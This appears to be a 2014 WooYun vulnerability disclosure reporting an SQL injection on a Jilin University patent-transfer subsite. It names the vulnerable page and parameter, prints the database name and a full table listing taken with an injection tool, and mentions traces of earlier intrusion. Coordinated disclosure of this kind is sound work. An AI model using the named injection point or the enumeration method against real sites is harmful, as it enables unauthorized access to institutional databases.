当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054911

漏洞标题:吉林大学某分站SQL注入漏洞

相关厂商:jlu.edu.cn

漏洞作者: sex is not show

提交时间:2014-03-31 11:19

修复时间:2014-05-15 11:20

公开时间:2014-05-15 11:20

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-31: 细节已通知厂商并且等待厂商处理中
2014-03-31: 厂商已经确认,细节仅向厂商公开
2014-04-10: 细节向核心白帽子及相关领域专家公开
2014-04-20: 细节向普通白帽子公开
2014-04-30: 细节向实习白帽子公开
2014-05-15: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

吉林大学专利与成果转化网 http://kjcg.jlu.edu.cn/
http://kjcg.jlu.edu.cn/pages/kjcgdt/read.aspx?id=7' 单引号直接报错

1.jpg


工具跑:

1.jpg


current database: 'projectex'

1.jpg


Database: projectex
[67 tables]
+----------------------------+
| dbo.Table1$ |
| dbo.[projectex.D99_CMD] |
| dbo.[projectex.D99_REG] |
| dbo.[projectex.D99_Tmp] |
| dbo.[projectex.dan_gege2] |
| dbo.[projectex.dan_gege] |
| dbo.[projectex.jiaozhu] |
| dbo.[projectex.kill_kk] |
| dbo.[projectex.t] |
| dbo.[projectex.t_jiaozhu] |
| dbo.[projectex.t_tian6] |
| dbo.[projectex.t_tian6_1] |
| dbo.[projectex.temp_tian6] |
| dbo.abilitytype |
| dbo.alliance |
| dbo.city |
| dbo.city1 |
| dbo.clzh |
| dbo.college |
| dbo.college_old |
| dbo.contract |
| dbo.contractstate |
| dbo.cooperation |
| dbo.corporation |
| dbo.division |
| dbo.domain |
| dbo.dqzc |
| dbo.dtproperties |
| dbo.e20090107 |
| dbo.exhibition |
| dbo.industry |
| dbo.inventor |
| dbo.inventorDeleted |
| dbo.kjcg |
| dbo.kjcgdt |
| dbo.kjdjxx |
| dbo.kjnl |
| dbo.links |
| dbo.member |
| dbo.notice |
| dbo.oaservice |
| dbo.oaservicetype |
| dbo.paper |
| dbo.patent |
| dbo.patent1 |
| dbo.patentDeleted |
| dbo.patentstate |
| dbo.position |
| dbo.priority |
| dbo.privilege |
| dbo.province |
| dbo.ptjs |
| dbo.qyxq |
| dbo.qyxqxx |
| dbo.rating |
| dbo.state |
| dbo.statistic |
| dbo.subject_code |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.systemconfig |
| dbo.title |
| dbo.transformtype |
| dbo.users |
| dbo.users_old |
| dbo.xzhxw |
| dbo.xzhxx |
+----------------------------+
显然有入侵的痕迹... dbo.[projectex.D99_CMD] |
不深入、

漏洞证明:

1.jpg


current database: 'projectex'

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-03-31 12:05

厂商回复:

谢谢!!我们会尽快处理!

最新状态:

暂无